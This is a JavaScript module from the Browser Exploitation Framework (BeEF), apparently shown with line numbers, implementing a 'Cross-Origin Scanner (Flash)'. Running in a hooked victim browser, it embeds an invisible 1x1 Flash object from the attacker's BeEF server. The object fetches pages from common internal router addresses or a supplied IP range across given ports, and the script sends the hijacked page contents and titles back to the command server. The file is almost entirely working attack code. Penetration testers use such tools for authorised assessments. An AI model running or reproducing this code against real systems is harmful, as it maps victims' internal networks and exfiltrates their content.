1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
  var ips = new Array();
10
  var ipRange = "<%= @ipRange %>";
11
  var ports   = "<%= @ports %>";
12
  var threads = parseInt("<%= @threads %>", 10);
13
  var timeout = parseInt("<%= @timeout %>", 10)*1000;
14

15
  // check if Flash is installed (not always reliable)
16
  if(!beef.browser.hasFlash()) {
17
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.are.status_error());
18
    return;
19
  }
20

21
  // set target ports
22
  if (ports != null) {
23
    ports = ports.split(',');
24
  }
25

26
  // set target IP addresses
27
  if (ipRange == 'common') {
28
    // use default IPs
29
    ips = [
30
      '192.168.0.1',
31
      '192.168.0.100',
32
      '192.168.0.254',
33
      '192.168.1.1',
34
      '192.168.1.100',
35
      '192.168.1.254',
36
      '10.0.0.1',
37
      '10.1.1.1',
38
      '192.168.2.1',
39
      '192.168.2.254',
40
      '192.168.100.1',
41
      '192.168.100.254',
42
      '192.168.123.1',
43
      '192.168.123.254',
44
      '192.168.10.1',
45
      '192.168.10.254'
46
    ];
47
  } else {
48
    // set target IP range
49
    var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
50
    if (range == null || range[1] == null) {
51
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error());
52
      return;
53
    }
54
    // ipRange will be in the form of 192.168.0.1-192.168.0.254
55
    // (only C class IP ranges are supported atm)
56
    ipBounds   = ipRange.split('-');
57
    lowerBound = ipBounds[0].split('.')[3];
58
    upperBound = ipBounds[1].split('.')[3];
59
    for (var i = lowerBound; i <= upperBound; i++){
60
      ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
61
      ips.push(ipToTest);
62
    }
63
  }
64

65
  // configure workers
66
  WorkerQueue = function(id, frequency) {
67
    var stack = [];
68
    var timer = null;
69
    var frequency = frequency;
70
    var start_scan = (new Date).getTime();
71
    this.process = function() {
72
      var item = stack.shift();
73
      eval(item);
74
      if (stack.length === 0) {
75
        clearInterval(timer);
76
        timer = null;
77
        var interval = (new Date).getTime() - start_scan;
78
        beef.debug("[Cross-Origin Scanner (Flash)] Worker #"+id+" has finished ["+interval+" ms]");
79
        return;
80
      }
81
    }
82
    this.queue = function(item) {
83
      stack.push(item);
84
      if (timer === null) timer = setInterval(this.process, frequency);
85
    }
86
  }
87

88
  // load the SWF object from the BeEF server
89
  // then request the specified URL via Flash
90
  var scanUrl = function(proto, host, port) {
91
    beef.debug('[Cross-Origin Scanner (Flash)] Creating Flash object...');
92
    var placeholder_id = Math.random().toString(36).substring(2,10);
93
    div = document.createElement('div');
94
    div.setAttribute('id', placeholder_id);
95
    div.setAttribute('style', 'visibility: hidden');
96
    $j('body').append(div);
97

98
    try {
99
    swfobject.embedSWF(
100
      beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf',
101
      placeholder_id,
102
      "1",   // Width
103
      "1",   // Height
104
      "9",   // Flash version required. Hard-coded to 9+ for no real reason. Tested on Flash 12.
105
      false, // Don't prompt user to install Flash
106
      {},    // FlashVars
107
      {'AllowScriptAccess': 'always'},
108
      {id: 'cross_origin_flash_'+placeholder_id, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'},
109
      function (e) {
110
        if (e.success) { 
111
          // 200 millisecond delay due to Flash executing the callback with a success event
112
          // even though the object is not yet ready to expose its methods to JS
113
          setTimeout(function(){
114
            var url = 'http://'+host+':'+port+'/';
115
            beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url);
116
            var objCaller = document.getElementById('cross_origin_flash_'+placeholder_id);
117
            try {
118
            objCaller.GETURL('function(data) { '+
119
              'var proto = "http";' +
120
              'var host = "'+host+'";' +
121
              'var port = "'+port+'";' +
122
              'var data = unescape(data);' +
123
              'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' +
124

125
              'if (data.match("securityErrorHandler")) {' +
126
              '  beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip="+host+"&status=alive", beef.are.status_success());' +
127
              '}' +
128

129
              'if (!data.match("Hijacked Contents:")) return;' +
130
              'var response = data.replace(/^Hijacked Contents:\\r\\n/);' +
131

132
              'var title = "";' +
133
              'if (response.match("<title>(.*?)<\\/title>")) {' +
134
              '  title = response.match("<title>(.*?)<\\/title>")[1];' +
135
              '}' +
136

137
              'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' +
138
              'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response, beef.are.status_success());' +
139
            ' }', url);
140
            } catch(e) {
141
              beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message);
142
            }
143
          }, 200);
144
        } else if (e.error) {
145
          beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object');
146
        } else beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object. Perhaps Flash is not installed?');
147
      });
148
      // Remove the SWF object from the DOM after <timeout> seconds
149
      // this also kills the outbound connections from the SWF object
150
      setTimeout('try { document.body.removeChild(document.getElementById("cross_origin_flash_'+placeholder_id+'")); } catch(e) {}', timeout);
151
    } catch (e) {
152
      beef.debug("[Cross-Origin Scanner (Flash)] Something went horribly wrong creating the Flash object with swfobject: " + e.message);
153
    } 
154
    beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the flash object to load...");
155
  }
156

157
  // append SWFObject script
158
  $j('body').append('<scr'+'ipt type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></scr'+'ipt>');
159

160
  // create workers
161
  beef.debug("[Cross-Origin Scanner (Flash)] Starting scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)");
162
  var workers = new Array();
163
  for (var id = 0; id < threads; id++) workers.push(new WorkerQueue(id, timeout));
164

165
  // allocate jobs to workers
166
  for (var i = 0; i < ips.length; i++) {
167
    var worker = workers[i % threads];
168
    for (var p = 0; p < ports.length; p++) {
169
      var host = ips[i];
170
      var port = ports[p];
171
      if (port == '443') var proto = 'https'; else var proto = 'http';
172
      worker.queue("scanUrl('"+proto+"', '"+host+"', '"+port+"');");
173
    }
174
  }
175

176
});
177

178

179